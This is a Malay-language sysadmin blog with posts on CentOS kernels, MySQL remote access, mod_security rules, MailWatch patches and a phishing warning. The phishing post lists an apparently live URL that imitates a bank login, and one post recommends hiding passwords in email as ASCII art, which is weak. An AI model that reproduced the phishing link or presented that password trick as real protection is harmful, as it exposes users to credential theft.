World Without IT is Empty

CentOS/RHEL 32bit cannot detect RAM more than 4GB

2011-08-03T16:39:00.000+08:00

Berjumpa sekali lagi sebab ada nota baru..hehehe
Aku baru ni ada buat upgrade RAM kepada server sistem dan web hosting. Asalnya ada 1 CPU upgrade jadi 2 CPU dan ada 2GB RAM tambah kepada 7GB RAM.

Server Web Hosting aku tu ada 30 virtualhost dalam tu kena maintain. So kena upgrade lah nak kasik laju sikit. Sebab part OS dan application tuning dah dibuat, so sekarang kena tune upgrade hardware part pulak.

Server tu model HP 140G3 jenis 1U dan boleh buat Mirroring sahaja sebab ada 2 slot HD. Maksimum RAM sehingga 16GB.

Sekiranya nak gunakan RAM lebih daripada 4GB, maka kena install Kernel PAE. Pakej Kernel PAE ni mampu digunakan atas server sehingga 64GB RAM (bergantung kepada maksimum kapasiti RAM server yang dibenarkan). Ianya memerlukan CPU yang mempunyai kapasiti Physical Address Extensions (PAE). Yang bukan support PAE Kernel hanya support sehingga 4GB RAM sahaja. Jadi kalau nak guna lebih dari 4GB RAM maka anda kenalah install kernel-PAE.

Kaedah pertama gunakan sepenuhnya YUM ;
1) Pastikan BIOS detect jumlah RAM sebenar
2) yum install kernel-PAE
3) Reboot server

Jika kaedah yum tak dapat install, cuba download dan install manual RPM :
1) Pastikan BIOS detect jumlah RAM sebenar

2) cd /opt (simpan kat /opt)
3) wget http://mirror.centos.org/centos/5/os/i386/CentOS/kernel-PAE-2.6.18-238.el5.i686.rpm
4) rpm -ivh kernel-PAE-2.6.18-238.el5.i686.rpm
5) login ke webmin, pergi ke menu Hardware > GRUB Boot Loader > Klik 'Edit Global Options'
Kemudian pada Default boot option pilih Kernel-PAE berkenaan. Klik Save.
6) Reboot server

Cara nak check OS dah baca RAM baru, adalah dengan login ke dalam webmin dan tengok 'System Information'. Real Memory akan terpapar jumlah RAM baru.

yeay!

~ Be a Creator Not a User ~

CPU 100% on Windows 7 and Firefox Hang on Windows 7

2011-06-30T08:44:00.000+08:00

Kalau tengok gambar ni dah macam lambang Proton je kan..hehehe..
Beberapa hari yang lepas, PC aku yang baru guna Windows 7 ni jadi gile..asal buka je terus slow.

1) Tengok kat Task Manager tab performance CPU aku maintain je load 100%...
2) Aduhai...aku saspek ada virus ni dalam pc aku..kot virus ni guna network tu jadi load tinggi.
3) Buka Resource Monitor aku tengok kat bahagian tab CPU, process system aku tinggi, guna 96% load CPU. System ni adalah NT Kernel Windows.
4) Aku google kat internet, ada kata suh restart semula PC ok, ada kata suh reinstall semula windows. Aku tk mampu dah nak mengadap PC nak install semula semua software kegunaan aku...huhu
5) Masa aku guna Windows XP dulu ada gak kes PC slow ni..last2 aku cari software 'combofix'
6) Nak download kat pejabat ni kena blok le pulak..aiyakk...kena la aku cari network streamyx nak download
7) Dah download tu aku takde thumb drive le pulak, hehehe..Notebook aku tertinggal kat kampung balik baru ni satu beg penuh isi gadget2 aku..hehehe..so menagih member pinjam thumb drive sat. Download software tu kat sini COMBOFIX
8) Then aku run kat PC aku, tak perlu run on safe mode pun tkpe. Software tu laksanakan tugasnya dan suh restart semula PC dan tunggu lagi. Done!
9) Aku biarkan PC aku terbuka dengan Firefox sekali terbuka. Pagi esoknya aku tengok semula PC aku dah tak hang dan load PC stabil. Kalau tak sebelum ni bila tinggalkan je PC dengan Firefox on mesti esoknya akan hang dan aku kena restart semula PC guna button ajaib di CPU.

combofix ni adalah spyware remover dan ia akan restore juga file di PC kepada yang asal. Mungkin PC aku dijangkiti salah seekor darinya..

yeay PC aku laju kembali!
~ Be a Creator Not a User ~

How to Grant Access User to MySQL

2011-06-28T14:53:00.002+08:00

Kita nak setup satu web server yang akan host 5 php application dan satu lagi server yang akan jadi sebagai DB server kepada semua PHP application tu tadi.

Langkah-langkahnya :

OS : CentOS 5.x / RHEL 5.3

1) SSH ke server DB

2) Edit fail my.cnf (# nano /etc/my.cnf)

3) Edit line bold berikut :

[mysqld]
user            = mysql
pid-file        = /var/run/mysqld/mysqld.pid
socket          = /var/run/mysqld/mysqld.sock
port            = 3306
basedir         = /usr
datadir         = /var/lib/mysql
tmpdir          = /tmp
language        = /usr/share/mysql/English
bind-address    = ip.server.db.anda
# skip-networking

4) Save dan restart mysql (# /etc/init.d/mysqld restart)

5) Kita nak bagi kebenaran akses daripada WEB Server kepada DB Server untuk guna DB MYSQL

# mysql -u root -p mysql

6) GRANT Access kepada DB Baru Create :

mysql> CREATE DATABASE namaDB;
mysql> GRANT ALL ON

namaDB.* TO namaUSER@'ip.server.web.anda' IDENTIFIED BY 'PASSWORD';

7) GRANT Access kepada DB sedia ada

mysql> update db set Host='202.54.10.20' where Db='webdb'; (update host baru utk db webdb)
mysql> update user set Host='202.54.10.20' where user='webadmin'; (update user baru dari host tu)

8) Keluar dari mysql :

mysql> exit

9) Kalau guna IPTable pada DB Server untuk kawal laluan keluar masuk server, update seperti berikut : (Benarkan akses dari subnet 192.168.0/24 melalui port 3306 ke server DB)

/sbin/iptables -A INPUT -i eth0 -s 192.168.1.0/24 -p tcp --destination-port 3306 -j ACCEPT

10) Nak test dari server WEB Server tadi :

$ mysql -u namaUSER –h ip.db.server.anda –p

11) Kalau nak tau port 3306 tu buka ke tk server DB tu :

$ telnet 65.55.55.2 3306

12) Kalau berjaya keluar suh masuk password dan berjaya, maka lepas lah tu!..well done!

~ Be a Creator Not a User ~

How to find File or Folder in Linux

2011-06-20T09:26:00.000+08:00

Fast update..
Kadang-kadang kita tak ingat path program atau sistem tu disimpan dalam server kita masa kita yum install atau install dari RPM..

So cara nak carinya guna kaedah find :
Tested on CentOS dan RHEL

find  -name

SAMPEL :

find /home -name /muzzo

(Cari folder nama muzzo kat dalam /home)

~ Be a Creator Not a User ~

OpenOffice vs LibreOffice

2011-06-17T15:05:00.000+08:00

Untuk makluman, versi OpenOffice sekarang ni dah di take over oleh Oracle dari Sun Microsystem. So far kalau kita tengok patch update amat perlahan oleh oracle. Tak pasti ianya strategi atau memang disengajakan. Versi Oo Oracle ini tidak menyokong untuk save as versi MS Office 2007 dan 2010. Buka fail MS 2007 dan 2010 ok.

Versi professional Oxygen Office pula sekarang ini masih belum ada patch baru dan masih lagi menggunakan versi Oo 3.2.1 dan last update pada bulan jun 2010. Versi Oxygen Office adalah juga klon Oo yang menambah banyak template2 yang menarik untuk kegunaan pengguna professional.

Oleh itu, versi Oo fully komuniti owned dihidupkan kembali dengan wujudkan LibreOffice. Versi ini kini menggunakan versi stable 3.3.2 (advanced patch dari Oo Oracle). Versi 3.4 telah mencapai versi final release sekarang ni dan tunggu masa untuk keluar versi stable. Features diperbaharui dalam versi 3.4 adalah :
http://www.libreoffice.org/download/3-4-new-features-and-fixes/

Saya baru gunakannya utk versi 3.4 [FINAL] dan libre office memang penambahbaikan telah dibuat. Yang boleh saya listkan ;
1) Speed masa load perisian dah makin laju
2) Speed convert to PDF untuk fail besar dah improve skit
3) Paling jelas, dulu nak copy page dari website dan paste dalam Writer memang satu masalah besar dan kadangkala boleh hang PC..biar canggih mana pun. Sekarang memang laju dan tak sangkut.
4) Kalau Software crash, bila buka semula dan recovery file, memang laju dari sebelum.Yang ni jelas improve dari pengalaman.

Jika berminat untuk explore LibreOffice (LO) ini boleh download di URL berikut :
http://www.libreoffice.org

~ Be a Creator Not a User ~

How to Use Mod Security in httpd [updated 7th July 2011]

2011-06-16T18:16:00.007+08:00

Sekarang ni tengah hot hackers nak serang portal gov.my atas sebab boikot SKMM blok laman web mengcetak rompakkan hasil seni filem-filem rakyat malaysia. Ini adalah versi updated 2.0 untuk kaedah pelaksanaannya.

[Lokasi Fail Server Windows]

C:/xampp/apache/conf – Folder menyimpan konfigurasi apache untuk xampp
C:/xampp/apache/conf/extra – Folder menyimpan konfigurasi module untuk xampp
C:/wamp/bin/apache2.2.x/conf – Folder menyimpan konfigurasi apache untuk wamp
C:/wamp/bin/apache2.2.x/conf/extra – Folder menyimpan konfigurasi module untuk wamp

[Lokasi Fail Server Linux]
➔ /etc/httpd – Folder menyimpan konfigurasi httpd
➔ /etc/httpd/conf - Folder menyimpan konfigurasi httpd
➔ /etc/httpd/conf.d - Folder menyimpan konfigurasi selain httpd
➔ /var/log/httpd - Folder menyimpan log httpd

[WINDOWS - XAMPP & WAMP]

Kaedah untuk configure mod security pada server Windows menggunakan apache versi 2 ke atas :

1) Muat turun versi terkini mod_security untuk Ms Windows di URL
http://www.apachelounge.com/download/mods/mod_security-2.6.0-win32.zip

2) Cipta folder ‘/modules/mod_security2’ pada Apache dan salin fail-fail ‘pcre.dll’, ‘libxml2.dll’ dan ‘mod_security2.so’ ke folder tersebut.

3) Muat turun fail dari website berikut ‘http://sourceforge.net/projects/mod-
security/files/modsecurity-crs/0-CURRENT/’ dan download fail terkini dan ekstrak
fail berkenaan ke folder ‘/conf/modsecurity’ pada Apache.

4) Memasang aplikasi ‘Visual C++ 2008 Redistributable Package’ dengan muat turun dari website berikut 'http://www.microsoft.com/download/en/details.aspx?displaylang=en&id=29'

5) Edit fail '/conf/modsecurity/base_rules/modsecurity_crs_20_protocol_violations.conf' dengan tambah '#' pada line 90 dan line 91.

KONFIGURASI MOD_SECURITY

6) Edit fail ‘httpd.conf’ bagi memasang modul Mod_Security pada Apache, taipkan di
bahagian bawah sekali file :

# Memasang Mod_Security
LoadModule security2_module modules/mod_security2/mod_security2.so
LoadModule unique_id_module modules/mod_unique_id.so
# This is the ModSecurity Core Rules Set.
# Basic configuration options
SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess Off
SecDefaultAction log,auditlog,deny,status:403,phase:2,t:lowercase,t:replaceNulls,t:compressWhitespace
SecAuditEngine RelevantOnly
SecAuditLogType Serial
SecAuditLog logs/mod_security2.log

# Handling of file uploads
# SecUploadDir /opt/apache-frontend/tmp/
SecUploadKeepFiles Off
# Debug log
SecDebugLog logs/modsec_debug.log
SecDebugLogLevel 0
# Maximum request body size we will
# accept for buffering
SecRequestBodyLimit 131072
# Store up to 128 KB in memory
SecRequestBodyInMemoryLimit 131072
# Buffer response bodies of up to
# 512 KB in length
SecResponseBodyLimit 524288
## General rules
SecRule ARGS "c:/" t:normalisePathWin
SecRule ARGS "\.\./" "t:normalisePathWin,id:99999,severity:4,msg:'Drive Access'"
SecRule ARGS "d:/" t:normalisePathWin
# End config
Include modsecurity.d/*.conf
Include modsecurity.d/base_rules/*.conf
Include modsecurity.d/optional_rules/*.conf
Include modsecurity.d/slr_rules/*.conf

MENGAKTIFKAN MOD_SECURITY

7) Restart Apache untuk mengaktifkan Mod_Security

8) Semak juga website anda agar berfungsi seeloknye. Cuba hack website tu dan lihat pada error log. Sekiranya mod security blok maka selamatlah website anda.

LINUX (CentOS, RHEL, Fedora)

Kaedah untuk configure mod security pada server Linux menggunakan apache versi 2 ke atas :

1) Login ke dalam server menggunakan SSH

2) Install mod security menggunakan kaedah berikut :
# yum install mod_security

3) Masuk ke folder httpd :
# cd /etc/httpd/

4) Cipta folder modsecurity.d (jika tiada lagi) :
# mkdir modsecurity.d

5) Muat turun fail dari website berikut ‘http://sourceforge.net/projects/mod-
security/files/modsecurity-crs/0-CURRENT/’ dengan mengugnakan kaedah berikut :
# wget http://sourceforge.net/projects/mod-security/files/modsecurity-crs/0-CURRENT/modsecurity-crs_2.2.0.tar.gz/download

* Cuba cari fail yang terkini di website tersebut

6) Ekstrak folder tersebut ke folder '/etc/httpd/modsecurity.d' :
# tar -C /etc/httpd/modsecurity.d -zxvf modsecurity-crs_2.2.0.tar.gz

KONFIGURASI MOD_SECURITY

7) Masuk ke folder /etc/httpd/conf.d :
# cd /etc/httpd/conf.d

8) Cipta fail 'mod_security.conf' (jika tiada) di dalam '/etc/httpd/conf.d/' :
# nano mod_security.conf

9) Sila gunakan contoh fail seperti berikut : Mod_Security.conf

MENGAKTIFKAN MOD_SECURITY

10)Edit dengan tambah '#' pada line 90 dan line 91.

11)Restart Apache untuk mengaktifkan Mod_Security
# /etc/init.d/httpd restart

12)Memastikan mod_security berfungsi
# tail -f /var/log/httpd/error_log

Sampel output :

[Sat May 09 23:18:31 2009] [notice] caught SIGTERM, shutting down
[Sat May 09 23:18:33 2009] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Sat May 09 23:18:34 2009] [notice] ModSecurity for Apache/2.5.9 (http://www.modsecurity.org/) configured.
[Sat May 09 23:18:34 2009] [notice] Original server signature: Apache/2.2.3 (CentOS)
[Sat May 09 23:18:34 2009] [notice] Digest: generating secret for digest authentication ...
[Sat May 09 23:18:34 2009] [notice] Digest: done
[Sat May 09 23:18:35 2009] [notice] Apache/2.2.0 (Fedora) configured -- resuming normal operations

13)Semak juga website anda agar berfungsi sebaiknya. Cuba hack website tu dan lihat pada error log seperti langkah 11. Sekiranya mod security blok maka selamatlah website anda.

AUTO UPDATE MOD SECURITY (OPTIONAL)

14)AUTO UPDATE mod_security rules dari OWASP [untuk LINUX Server sahaja, untuk windows kena cari perl installer untuk run perl file].

A. Dapatkan senarai repository
# ./rules-updater.pl -rhttp://www.modsecurity.org/autoupdate/repository/ -l

B. Dapatkan versi terkini "modsecurity-crs" :
# ./rules-updater.pl -rhttp://www.modsecurity.org/autoupdate/repository/ -prules -Smodsecurity-crs
Fetching: modsecurity-crs/modsecurity-crs_2.1.0.zip ...
# ls -R rules
modsecurity-crs
rules/modsecurity-crs:
modsecurity-crs_2.1.0.zip modsecurity-crs_2.1.0.zip.sig

TUNING RULES MOD SECURITY

15)Tambah line berikut dalam file '/etc/httpd/conf.d/mod_security.conf' :
(Tujuannya adalah untuk membenarkan mod security berfungsi dan log sebarang aktiviti merbahaya dikenalpasti daripada rules yang dibina tanpa halangan. Ini bagi tujuan mengenalpasti sebarang rules yang mengganggu operasi Web Server tersebut)

SecFilterDefaultAction log,pass

SEMOGA BERJAYA!!!

~ Be a Creator Not a User ~

How to release accidentally spam mail in MailScanner to the recepient without the original message attached

2011-06-07T11:47:00.014+08:00

Kes ni memang dah lama aku hadapi. Dan sering memerlukan aku ikut kaedah pergi ke server dan cari folder dan fail tu kendian baru la release semula kepada penerima emel tu. Sebab biasa la spam server ni ada kala terblok emel2 penting yang dihantar dari FREE mail hosting macam gmail dan yahoo ni. Even kekadang dari pengguna valid government domain pun terblok. Ini disebabkan oleh penggunaan kaedah scoring bagi perkara-perkara yang terdapat dalam emel tersebut. Contohnya semu huruf besar di subject emel letakkan score = 3.5, limit score untuk tentukan emel spam atau bersih adalah 3.3. So dah sah2 emel tu akan dikategorikan sebagai emel spam..so bagi pengguna emel, kenala faham tugas IT Man ni bukannya mudah..nak kena rearrange semula scoring tu supaya match dengan current spam mail environment yang sering berubah-ubah.

Mailwatch ni memang telah digunakan sebagai default monitoring emel spam untuk MailScanner. Sekarang dah ada versi lain dipanggil Baruwa...macam budak melayu je buat..kalau ikut nama tu..ahaks!..Kaedah yang digunakan ini akan mengubah kaedah biasa Mailwatch berfungsi kebiasannya iaitu :

- Emel tag sebagai spam akan dikuarantin

- Apabila di release menggunakan mailwatch ia akan dihantar oleh sender admin emel dan emel asal akan di jadikan sebagai attachment 'Original Message'.

- Pengguna akan terima emel tersebut dimaklumkan bahawa emelnya telah dilepaskan dari kuarantin

- Pengguna tak boleh baca attachment dan kandungannya. Hanya header emel sahaja boleh dilihat..

- Ini masalahnya.

Penyelesaian diperlukan :

- Emel tag sebagai spam akan dikuarantin

- Admin akan release menggunakan mailwatch dan menggunakan penghantar emel admin (untuk memudahkan whitelist) tapi sebenarnya apabila penerima menerima emel tersebut, penghantar emel sebenar yang menghantar emel tersebut kepada penerimanya

- Pengguna terima emel tersebut seolah-olah sebenarnya emel tu tak dikuarantin sebagai spam pun

- Pengguna boleh terus baca emel tersebut seperti biasa tanpa ada masalah

- Kaedah ini diinginkan.

OS : CentOs 5.x

MailWatch : 1.04

MailScanner : 4.74.x

Beberapa perkara diperlukan :

Mailfeeder
Patch to mailwatch

Mailfeeder :

1) Install mailfeeder :

# wget http://www.pldaniels.com/mailfeeder/mailfeeder-0.2.3.tar.gz

2)  Extract dan bina fail tersebut :

# tar xzvf mailfeeder-0.2.3.tar.gz
# cd mailfeeder-0.2.3
# make
# cp mailfeeder /usr/local/bin

Patch MailWatch

1) buka fail : conf.php (dalam folder /var/www/html/mailscanner)

komen row berikut :

//define(QUARANTINE_USE_SENDMAIL, false);
//define(QUARANTINE_SENDMAIL_PATH, '/usr/sbin/sendmail');

gantikan dengan :
define(QUARANTINE_USE_SENDMAIL, true);
define(QUARANTINE_SENDMAIL_PATH, '/usr/local/bin/mailfeeder');

2) buka fail :  functions.php (dalam folder /var/www/html/mailscanner)

tambah row berikut di lokasi berikut :

DATE_FORMAT(date,'%Y%m%d') AS date, 
   id,
   to_address,
+  from_address,
   CASE WHEN isspam>0 THEN 'Y' ELSE 'N' END AS isspam, 
   CASE WHEN nameinfected>0 THEN 'Y' ELSE 'N' END AS nameinfected,
   CASE WHEN virusinfected>0 THEN 'Y' ELSE 'N' END AS virusinfected,

tambah row berikut di lokasi berikut :

    $quarantined[$count]['host']  = $row->hostname;
    $quarantined[$count]['msgid'] = $row->id;
    $quarantined[$count]['to']  = $row->to_address;
+   $quarantined[$count]['from']  = $row->from_address;
    $quarantined[$count]['file']  = "message";
    $quarantined[$count]['type']  = "message/rfc822";
    $quarantined[$count]['path']  = $nonspam;

tambah row berikut di lokasi berikut :

$quarantined[$count]['host']  = $row->hostname;
    $quarantined[$count]['msgid'] = $row->id;
    $quarantined[$count]['to']  = $row->to_address;
+   $quarantined[$count]['from']  = $row->from_address;
    $quarantined[$count]['file']      = "message";
    $quarantined[$count]['type']      = "message/rfc822";
    $quarantined[$count]['path']      = $spam;

tambah row berikut di lokasi berikut :

    $quarantined[$count]['host']         = $row->hostname;
    $quarantined[$count]['msgid']        = $row->id;
    $quarantined[$count]['to']           = $row->to_address;
+   $quarantined[$count]['from']  = $row->from_address;
    $quarantined[$count]['file']         = "message";
    $quarantined[$count]['type']         = "message/rfc822";
    $quarantined[$count]['path']         = $mcp;

tambah row berikut di lokasi berikut :

$quarantined[$count]['host'] = $row->hostname;
      $quarantined[$count]['msgid'] = $row->id;
      $quarantined[$count]['to']  = $row->to_address;
+     $quarantined[$count]['from'] = $row->from_address;
      $quarantined[$count]['file']  = $f;
      $file    = escapeshellarg($quarantine.'/'.$f);
      $quarantined[$count]['type']  = ltrim(rtrim(`/usr/bin/file -bi $file`));

keluarkan row (-) dan tambah row (+) berikut di lokasi berikut :

} else {
    // Use sendmail to release message
    // We can only release message/rfc822 files in this way.
-   $cmd = QUARANTINE_SENDMAIL_PATH." -i -f ".QUARANTINE_FROM_ADDR." ".escapeshellarg($to)." < ";
+   // we will use mailfeeder to send the message to maintain state
+   //$cmd = QUARANTINE_SENDMAIL_PATH." -i -f ".QUARANTINE_FROM_ADDR." ".escapeshellarg($to)." < ";
+   $cmd = QUARANTINE_SENDMAIL_PATH." -S 127.0.0.1 -s ".QUARANTINE_FROM_ADDR." -r ".escapeshellarg($to)." -i ";
    foreach($num as $key=>$val) {
     if(preg_match('/message\/rfc822/',$list[$val]['type'])) {
      debug($cmd.$list[$val]['path']);

* Pastikan anda setkan quarantine sender emel  :

define(QUARANTINE_FROM_ADDR, 'spamadmin@spam.org.my');

Restart MailScanner :

1) /etc/init.d/MailScanner restart

2) Cuba gunakan fungsi release emel dalam mailwatch dan anda akan dapat lihat

dalam senarai emel masuk ianya telah direlease kepada pengguna asal dengan

menggunakan emel admin. Penerima emel akan lihat emel sender adalah dari emel

sebenar penghantar dan bukan emel admin.

Alhamdulillah akhirnya ianya berjaya dan mudah aku nak assign staff untuk handle

emel spam ni dengan lebih mudah.

Ilmu itu ada, cuma kita kena cari sesabarnya dan sebijaknya..

Jom cuba!

~ Be a Creator Not a User ~

How to setup MSSQL Driver to be used in Linux Web Application Server

2011-06-07T11:17:00.000+08:00

ketepi kau spider..aku rasa bersawang dah blog aku ni...hahaha..maaf la aku tk sempat sungguh nak update..ni pun kira short update je..sebab aku baru dapat resolve kaedah nak connect DB mssql dari web server linux. Dalam server tu ada application yang gunakan PHP dan memerlukan connect kepada database MSSQL. System owner ni punye la kata, dia test kat PC dia ok je..dah guna xampp semuanya boleh..tapi kalau nk setup dalam server LIVE Linux ni kena la tambah add-on tu sebab by default tak guna driver mssql..ingat never install everything yang tak perlu dalam server dan biarkan begitu sahaja. Mudah dikesan hackers untuk buat serangan..dan jangan guna XAMPP untuk live web server!!!..

OS : RHEL 5.x

PHP : 5.3.x

Langkahnya :

1) Install unixODBC

wget http://rpm.pbone.net/index.php3/stat/3/srodzaj/2/search/unixODBC-2.2.11-7.1.src.rpm

2) Install unixODBC

yum install unixODBC-2.2.11-7.1.src.rpm

3) Install FreeTDS :

yum install freetds freetds-devel --enablerepo=rpmforge

(pastikan repo rpmforge ada digunakan)

install rpmforge repo :

 wget http://packages.sw.be/rpmforge-release/rpmforge-release-0.5.2-2.el5.rf.i386.rpm

 rpm --import http://apt.sw.be/RPM-GPG-KEY.dag.txt

 rpm -K rpmforge-release-0.5.2-2.el5.rf.*.rpm (sahkan rpm download tu betul atau tak)

 yum install rpmforge-release-0.5.2-2.el5.rf.i386.rpm

4) Install php-devel :

yum install php-devel

5) Install php-mssql :

yum install php-mssql

6) Restart Apache :

/etc/init.d/httpd restart

7) Edit file php.ini dengan menambah line berikut :

extension = mssql.so

7) Done!. Now you can test your DB MSSQL Connection

~ Be a Creator Not a User ~

How to Rollback Yum Update

2011-03-14T17:00:00.000+08:00

Ringkas dan straight to the point. Berikut adalah kaedah untuk kita buat rollback (restore) semula kepada versi asal sebelum dilaksanakan 'yum update' :

Tambah tsflags=repackage ke dalam fail /etc/yum.conf
Tambahkan %_repackage_all_erasures 1 ke dalam fail /etc/rpm/macros (Jika fail masih tiada, createkan fail baru dengan nama tersebut)
Install, erase, dan update menggunakan pup, pirut, yumex, yum, rpm, dan the yum automatic update service.
Kemudian anda rasa menyesal sebab versi tu tak compatible jadi nak rollback ke versi asal, anda kena gunakan rpm bersama --rollback. Setiap kali laksana yum, sebenarnya yang menjalankan proses instalasi dan update adalah command rpm. Contoh command rollback rpm :

rpm -Uhv --rollback '9:00 am'
rpm -Uhv --rollback '4 hours ago'
rpm -Uhv --rollback 'december 25'

* Ingat!!!...sebelum nak yum update, setting 2 fail tersebut terlebih dahulu. Setting ni laksana sekali sahaja.

Semoga berjaya hendaknya..

~ Be a Creator Not a User ~

Phishing Website

2011-03-08T18:08:00.000+08:00

Saje arini aku nak share aku ada terima emel spam berkenaan suh update akaun maybank2u. Aku memang dah tau site tu phishing tapi saje je jugak pi klik.

Aku dah delete la pulak emel tu tadi..tk dapat nak tunjukkan screenshotnya.

So sebelum aku klik tu aku dah prepare dah make sure antivirus SEP aku updated dan Firefox aku dah diinstall dengan DontPhishMe add-ons. Add ons tu orang malaysia sendiri yang buat, team mycert. Memang power ah group tu. Nak download guna add ons tu leh klik kat url ni :
https://addons.mozilla.org/en-us/firefox/addon/dontphishme/

Kalau guna IE tu biasanya kalau update patch kepada terkini dah ada juga phishing add-ons.

Tindakan nakal aku buat :

1) Klik URL ni : https://www.medi-fix.com.my/mbb/m2u/common/M2ULogin.do
2) So ia akan redirect ke page yang sebijik macam login page maybank2u
3) Dengan adanya add ons DontPhishMe ni ia akan keluar pop-up sebegini :

4) Seterusnya jika kita klik Cancel, ia akan keluarkan pop-up sekali lagi sebegini :

5) Jika klik cancel juga memang degil sunggoh, maka masukla ke page tu. Anda sendiri tanggung risiko la sebab orang dah peringatkan.

6) Untuk IE pulak bila aku klik URL tu tadi, ia akan keluar sebegini :

So hati-hatilah dengan Phishing Website ni. Perhatikan betul-betul domain digunakan dan pastikan ada ikon mangga dibawah kanan browser atau berbeza ikut jenis browser. Any further info rujuk site ni : http://www.cybersafe.my/home.html

Semoga berjaya!

~ Be a Creator Not a User ~

How to Make Your Tablet PC Useful

2011-02-15T17:53:00.000+08:00

Kali ni aku nak kongsi cara-cara nak jadikan tablet PC lebih berguna dan bukan sekadar membeli sahaja tapi tak tahu guna dengan sebaiknya. Macam kat ofis aku ada beli 2 IPad tapi cembiasa la utk golongan atasan. Sesapa saja leh guna tips ni...aku pun belum ada, in future mungkin aku akan beli satu..

1) Simpan tablet PC dalam Beg

- Saiz yang kecil dan fleksibel membolehkan ia dibawa kemana saja dan sambil tunggu bas pun boleh guna tablet PC.

2) Mudah bawa dalam Kerja

- Doktor leh guna tablet PC untuk semak carta kesihatan pesakit. Pelukis boleh lakar gambar di tablet PC dan boleh dicetak terus dengan lebih cepat. Peniaga boleh buat kiraan stok menerusi sistem stok barangan.

3) Baca buku

- Guna tablet PC boleh gantikan buku novel yang tebal. Ianya mudah dibawa dan boleh dibaca dalam gelap sebab ada cahaya dari tablet PC. Tak perlu cahaya tambahan.Banyak sekarang e-Majalah, eBook dan dokumen PDF. Hanya muat turun dan baca pada bila-bila masa.

4) Ikuti Berita

- Boleh baca surat khabar online sekarang ni. Tablet PC dengan jalur lebar lebih baik.

5) Power Point / Impress

- Boleh sunting dan bina persembahan untuk tujuan kerja dengan lebih mudah. Jika ada fungsi VGA terus ke LCD Projektor pasti lagi mudah.

6) Lakaran Kreativiti

- Memandangkan saiznya seperti buku tulis kecil, ada pen stylus bersamanya maka boleh melukis padanya dengan lebih mudah. Pelukis jalanan boleh cari makan guna ni. Terus sambung ke printer untuk cetakan.

7) Ambil Nota

- Boleh dijadikan sebagai gantian buku nota. Dalam tablet PC ada perisian kenal tulisan dan convert kepada teks. Jadi sambil dengar khutbah, dengar tazkirah kat masjid atau dengar cikgu mengajar tu boleh la guna tablet PC catat apa patut..kan bagus kegunaan tu.

8) Simbol Matematik

- Menulis simbol matematik yang pelik2 lebih mudah dengan ada tablet PC sebab kebanyakan simbol matematik susah nak ditulis dalam Notebook dan PC biasa. Ini kerana lukis je simbol tu kat dalam PC.

9) Mesyuarat

- Kerja nak menulis minit mesyuarat ni bukan kerja senang, dahla kena siapkan dalam masa 3 hari. Dengan ada tablet PC ni maka lebih mudah nak mencatat minit mesyuarat on the spot terus semasa mesyuarat. Selain tu, kalau guna notebook, skrin depan kita tu dah terhalang dari pengerusi mesyuarat.kan ke tak mesra lak nanti duk menaip minit mesyuarat tapi macam menyuruk belakang skrin notebook je...hehehe

10) Ucapan

- Gunakan tablet PC sebagai ganti untuk baca teks ucapan perasmian dalam sesuatu majlis. Nak selak muka surat pun mudah dengan tablet PC. Bergaya la skit pemberi ucapan perasmian bawak tablet PC naik pentas. Selain tu ada perisian boleh convert pengucapan kepada perkataan.

11) Borang

- Guna tablet pc untuk isi borang soal selidik ke, oder barang ke, check in hotel ke. Kalau nak guna kios kan ke besar gedabak saiznya dan perlukan ruang.

12) Log

- Menyimpan log pekerjaan yang dilakukan terus ke dalam PC. Log tu boleh terus hantar menerusi emel dan boleh cetak jika diperlukan.

13) Resipi di dapur

- Kalau nak memasak, tengok je tablet PC. Tkyah nak salin dalam buku nota lusuh2 atau print kat kertas semata nak memasak. Siap boleh tengok cara-cara memasak lagi dalam youtube.

14) Album Foto

- Tablet pc boleh ganti buku album yang banyak2 tu. Boleh simpan gambar2 yang diambil dalam tu dan boleh belek bila-bila masa saja. Sambil tu boleh jadikan frame gambar, kalau time nak tido tu leh tengok2 gambar tersyg senang sikit nak tido.

15) Menonton Movie

- Kepuasan menonton movie bukanlah keutamaan bila menggunakan tablet PC ni tapi lebih kepada mobiliti.

16) Permainan

- Permainan ringan boleh dimainkan terus dari tablet PC sekadar nak hilangkan stress.

17) Proposal / Resume

- Kalau buat proposal tu leh terus tunjuk dalam tablet je takyah nak print out binding banyak2. Selain tu kalau gi interview leh bawak tablet PC as resume digital. Baru bergaya, dan orang yakin sikit kat kita.

18) Diari

- Boleh menulis diari dalam tablet anda gantikan buku diari. cuma sentimental value tu kurang la. Dan kalau tablet pc kena virus, data diari anda akan hilang atau kena curi...bahaya gak wooo...

Moga tips ni yang aku adapt dari Majalah PC edisi Februari 2011 mampu membantu anda mempelbagaikan penggunaan tablet PC ni bukan sekadar nak surf Facebook je...buat rugi je..

~ Be a Creator Not a User ~

Alternative Solution To Tell Password in Email

2011-01-27T17:18:00.001+08:00

Dalam kebanyakan urusan kita yang menggunakan emel sebagai medium urusan rasmi sering menggunakannya untuk bertukar maklumat berkaitan kerja atau bisnes. Kadangkala kita juga bertukar maklumat kata laluan di dalam emel kita.

Salah satu alternatif kepada penyelesaian tersebut adalah seperti berikut :
(Ianya bukanlah penyelesaian yang susah untuk di hack oleh hackers tapi membantu mengurangkan risiko melihat terus pada pandangan kasar maklumat tersebut )

1) Kata laluan yang digunakan : 'hantu'
2) Cipta imej berdasarkan perkataan tersebut menggunakan perisian online berikut :
http://interactimage.com/
Taip pada ruang 'Enter Text Below' dan seterusnya klik butang CREATE
3) Imej tulisan tersebut akan terjana di ruang atas
4) Halakan mouse pointer sehingga keluar ikon + dan Klik Kanan pada imej tersebut dan pilih 'save image as'. Simpan ke dalam PC anda
5) Seterusnya kita akan cipta ASCII berdasarkan fail imej tersebut.
6) Terus ke URL berikut : http://www.studenthere.com/redirect.php?url=http://www.text-image.com/convert/ascii.html
7) Pilih fail imej tadi dan seterusnya ikut konfigurasi seperti berikut :

8) Seterusnya klik Convert!
9) Paparan berikut akan terjana :

10)Highlight kan tulisan tersebut dan klik kanan seterusnya pilih 'copy'
11) Buka New Emaill Compose anda dengan menetapkan menulis secara HTML
12) Kemudian klik kanan pada ruang penulisan compose email tersebut dan pilih 'paste'.
13) Paparan berikut dalam New Email Compose anda :

14) Rupa emel apabila dibaca :

Selamat mencuba!

~ Be a Creator Not a User ~

Tips to Develop A Good Web Application

2011-01-04T16:07:00.000+08:00

